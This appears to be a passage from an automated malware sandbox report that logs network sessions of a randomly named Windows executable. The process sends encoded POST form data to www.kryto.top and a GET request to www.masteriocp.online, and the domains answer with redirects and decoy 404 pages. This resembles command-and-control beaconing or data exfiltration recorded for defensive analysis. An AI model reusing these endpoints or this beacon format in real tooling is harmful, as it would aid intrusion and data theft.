                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        12 | 192.168.2.4 | 49754 | 54.179.173.60 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:52:31.632414103 CEST | 498 | OUT | GET /wg84/?3ry=nj20Xr&lt=xCESFhhZDtyM/hrw6j3C0mYJuuPBnIqscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiIMBWOeQzOKw0PF/QCepN6DzDO5x86004gqo= HTTP/1.1
                        Host: www.masteriocp.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:52:32.576193094 CEST | 503 | IN | HTTP/1.1 301 Moved Permanently
                        Server: openresty
                        Date: Mon, 09 Sep 2024 02:52:32 GMT
                        Content-Type: text/html
                        Content-Length: 166
                        Connection: close
                        Location: https://www.masteriocp.online/wg84/?3ry=nj20Xr&lt=xCESFhhZDtyM/hrw6j3C0mYJuuPBnIqscVTptQKfPtsk1ZKvJSltY0eiWzxDTaRBwjdwHUWMVo3i0crzNkgiIMBWOeQzOKw0PF/QCepN6DzDO5x86004gqo=
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        13 | 192.168.2.4 | 49755 | 162.0.213.94 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:52:37.976773024 CEST | 753 | OUT | POST /09dt/ HTTP/1.1
                        Host: www.kryto.top
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 199
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.kryto.top
                        Referer: http://www.kryto.top/09dt/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 6d 5a 33 6d 36 51 61 33 5a 59 2f 32 46 53 57 4c 52 50 70 43 42 56 72 4a 36 77 68 6e 38 35 43 7a 56 67 49 6a 63 51 6d 41 36 41 49 42 70 4c 41 7a 42 64 30 38 79 55 6e 56 58 67 58 73 41 30 59 46 30 74 64 74 7a 75 6c 6e 53 4c 69 33 4b 79 55 38 35 47 5a 47 54 5a 63 66 79 5a 55 50 71 41 34 4c 43 43 4b 6f 77 70 34 33 75 6a 7a 4a 2b 62 78 6d 79 31 4f 43 57 2f 37 49 34 6d 53 57 57 36 61 4d 49 43 47 37 6d 6f 39 4f 44 45 44 6f 6b 32 48 38 4c 46 6f 32 62 54 37 6f 56 43 31 58 69 31 47 58 61 36 6c 66 74 51 46 75 52 56 52 37 45 79 34 66 57 31 78 4c 56 49 44 53 50 6e 38 53 56 73 4f 62 33 41 3d 3d
                        Data Ascii: lt=mZ3m6Qa3ZY/2FSWLRPpCBVrJ6whn85CzVgIjcQmA6AIBpLAzBd08yUnVXgXsA0YF0tdtzulnSLi3KyU85GZGTZcfyZUPqA4LCCKowp43ujzJ+bxmy1OCW/7I4mSWW6aMICG7mo9ODEDok2H8LFo2bT7oVC1Xi1GXa6lftQFuRVR7Ey4fW1xLVIDSPn8SVsOb3A==
                        Sep 9, 2024 04:52:38.628638029 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                        Date: Mon, 09 Sep 2024 02:52:38 GMT
                        Server: Apache
                        Content-Length: 16052
                        Connection: close
                        Content-Type: text/html
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                        Sep 9, 2024 04:52:38.628658056 CEST | 1236 | IN | Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                        Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                        Sep 9, 2024 04:52:38.628669024 CEST | 448 | IN | Data Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                        Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                        Sep 9, 2024 04:52:38.628680944 CEST | 1236 | IN | Data Raw: 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33 38 20 2d 30 2e 39 31 34 31 30 33 2c 31 2e 35 30 33 36 35 20 2d 31 2e 36
                        Data Ascii: 68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396 2.209666,-0.76581 4.0014
                        Sep 9, 2024 04:52:38.628691912 CEST | 1236 | IN | Data Raw: 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33 34 33 32 2c 38 2e 32 34 39 37 31 20 2d 34 2e 37 35 30 33 31 35 2c 31 31
                        Data Ascii: 49655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91675 15.180267,5
                        Sep 9, 2024 04:52:38.628703117 CEST | 1236 | IN | Data Raw: 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e 31 36 36 36 37 20 31 30 2e 37 34 39 39 36 2c 31 32 2e 34 39 39 39 35 20
                        Data Ascii: 786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.4206
                        Sep 9, 2024 04:52:38.628714085 CEST | 1236 | IN | Data Raw: 33 2c 32 33 2e 38 30 36 34 37 20 2d 30 2e 35 33 30 33 34 2c 31 34 2e 31 34 33 33 38 20 2d 32 2e 38 38 37 30 36 2c 33 36 2e 35 33 32 32 36 20 2d 35 2e 34 32 30 39 2c 35 36 2e 34 34 39 35 31 20 2d 32 2e 35 33 33 38 33 2c 31 39 2e 39 31 37 32 35 20
                        Data Ascii: 3,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44951 -2.53383,19.91725 -5.24428,37.35836 -7.95503,54.80146" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;strok
                        Sep 9, 2024 04:52:38.628727913 CEST | 896 | IN | Data Raw: 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22
                        Data Ascii: butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.12978,122.92016 c -2.601311,10.56131 -5.214983,21.17282 -7.40283,31.41665 -2.187847,10.24384 -3.955407,20.14218 -5.074975,26.03483
                        Sep 9, 2024 04:52:38.628851891 CEST | 1236 | IN | Data Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                        Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                        Sep 9, 2024 04:52:38.628864050 CEST | 224 | IN | Data Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                        Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"
                        Sep 9, 2024 04:52:38.633610010 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 72 78 3d 22 32 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 79 3d 22 32 33 38 2e 30 38 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 31 31 39 2e 31 32 32 36 32 22 0a 20 20 20 20 20 20 20 20 20
                        Data Ascii: rx="2.5" cy="238.08525" cx="119.12262" id="path4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterl


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        14 | 192.168.2.4 | 49756 | 162.0.213.94 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:52:40.523871899 CEST | 773 | OUT | POST /09dt/ HTTP/1.1
                        Host: www.kryto.top
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 219
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.kryto.top
                        Referer: http://www.kryto.top/09dt/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 6d 5a 33 6d 36 51 61 33 5a 59 2f 32 48 79 47 4c 65 49 31 43 51 6c 72 47 30 51 68 6e 70 70 43 33 56 67 30 6a 63 55 2b 51 36 79 38 42 6e 4a 49 7a 41 63 30 38 31 55 6e 56 64 41 57 6d 64 45 59 53 30 73 68 54 7a 73 78 6e 53 49 65 33 4b 32 51 38 35 78 4e 48 54 4a 63 64 36 35 55 4a 75 41 34 4c 43 43 4b 6f 77 70 39 71 75 69 62 4a 2b 72 42 6d 67 41 36 42 59 66 37 58 73 32 53 57 64 61 61 41 49 43 47 5a 6d 70 68 6b 44 48 72 6f 6b 7a 44 38 50 45 6f 31 51 54 37 79 59 69 31 44 75 58 53 61 66 4c 5a 51 6c 44 74 41 50 6c 52 6f 4d 55 70 46 48 45 51 63 48 49 6e 68 53 67 31 6d 59 76 7a 53 73 41 50 62 55 56 72 32 36 6d 79 73 53 41 36 53 72 59 42 46 51 6f 73 3d
                        Data Ascii: lt=mZ3m6Qa3ZY/2HyGLeI1CQlrG0QhnppC3Vg0jcU+Q6y8BnJIzAc081UnVdAWmdEYS0shTzsxnSIe3K2Q85xNHTJcd65UJuA4LCCKowp9quibJ+rBmgA6BYf7Xs2SWdaaAICGZmphkDHrokzD8PEo1QT7yYi1DuXSafLZQlDtAPlRoMUpFHEQcHInhSg1mYvzSsAPbUVr26mysSA6SrYBFQos=
                        Sep 9, 2024 04:52:41.191790104 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                        Date: Mon, 09 Sep 2024 02:52:41 GMT
                        Server: Apache
                        Content-Length: 16052
                        Connection: close
                        Content-Type: text/html
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                        Sep 9, 2024 04:52:41.191812038 CEST | 1236 | IN | Data Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                        Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                        Sep 9, 2024 04:52:41.191823006 CEST | 1236 | IN | Data Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                        Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                        Sep 9, 2024 04:52:41.191840887 CEST | 1236 | IN | Data Raw: 30 2e 37 36 32 37 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 34 35 35 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66
                        Data Ascii: 0.76272" id="rect4553" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <pa
                        Sep 9, 2024 04:52:41.191854000 CEST | 896 | IN | Data Raw: 32 2c 31 35 2e 35 30 30 36 34 20 30 2e 39 31 36 37 39 38 2c 36 2e 38 33 34 33 34 20 32 2e 32 34 39 38 35 34 2c 31 36 2e 33 33 32 33 37 20 33 2e 34 39 39 39 30 32 2c 32 34 2e 39 31 36 30 34 20 31 2e 32 35 30 30 34 37 2c 38 2e 35 38 33 36 38 20 32
                        Data Ascii: 2,15.50064 0.916798,6.83434 2.249854,16.33237 3.499902,24.91604 1.250047,8.58368 2.416611,16.24967 4.583438,28.58394 2.166827,12.33427 5.333153,29.33244 8.499966,46.33323" style="display:inline;fill:none;stroke:#000000;stroke-widt
                        Sep 9, 2024 04:52:41.191865921 CEST | 1236 | IN | Data Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                        Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                        Sep 9, 2024 04:52:41.191879034 CEST | 1236 | IN | Data Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                        Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                        Sep 9, 2024 04:52:41.191890001 CEST | 448 | IN | Data Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                        Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                        Sep 9, 2024 04:52:41.192078114 CEST | 1236 | IN | Data Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                        Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                        Sep 9, 2024 04:52:41.192154884 CEST | 1236 | IN | Data Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                        Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                        Sep 9, 2024 04:52:41.196687937 CEST | 1236 | IN | Data Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                        Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        15 | 192.168.2.4 | 49757 | 162.0.213.94 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:52:43.081810951 CEST | 10855 | OUT | POST /09dt/ HTTP/1.1
                        Host: www.kryto.top
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 10299
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.kryto.top
                        Referer: http://www.kryto.top/09dt/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Raw: 6c 74 3d 6d 5a 33 6d 36 51 61 33 5a 59 2f 32 48 79 47 4c 65 49 31 43 51 6c 72 47 30 51 68 6e 70 70 43 33 56 67 30 6a 63 55 2b 51 36 79 45 42 6e 38 63 7a 42 37 67 38 30 55 6e 56 65 41 57 6c 64 45 59 50 30 73 35 66 7a 73 39 52 53 4f 53 33 4c 54 45 38 78 67 4e 48 47 35 63 64 32 5a 55 49 71 41 34 65 43 44 36 73 77 70 74 71 75 69 62 4a 2b 6f 5a 6d 77 46 4f 42 61 66 37 49 34 6d 53 53 57 36 61 73 49 43 76 75 6d 70 30 54 41 32 4c 6f 6b 54 7a 38 4a 6d 51 31 4d 44 37 30 62 69 30 45 75 58 50 61 66 4b 30 68 6c 43 5a 71 50 6e 4e 6f 49 6c 41 75 63 48 51 51 54 4f 76 56 4e 69 74 53 5a 64 7a 65 6c 51 4c 6e 53 6e 4c 38 36 6e 4f 30 52 77 79 62 7a 6f 56 31 4e 70 71 56 64 61 63 34 50 4f 69 47 51 42 71 4b 2f 4b 57 77 76 54 6f 6d 63 31 69 65 31 31 52 4c 52 6e 58 43 34 76 38 47 38 31 4e 30 31 63 52 38 41 4f 7a 54 78 64 70 72 59 47 4d 55 72 59 53 6e 2b 42 4c 70 6f 49 65 4e 75 35 34 47 44 4d 32 47 4b 71 6b 41 30 61 77 41 37 43 69 50 4a 33 36 64 31 49 6f 6e 31 78 62 50 48 41 74 6f 38 78 38 32 64 5a 58 34 45 6a 33 4c 56 33 4b [TRUNCATED]
                        Data Ascii: lt=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 [TRUNCATED]
                        Sep 9, 2024 04:52:43.748126030 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                        Date: Mon, 09 Sep 2024 02:52:43 GMT
                        Server: Apache
                        Content-Length: 16052
                        Connection: close
                        Content-Type: text/html
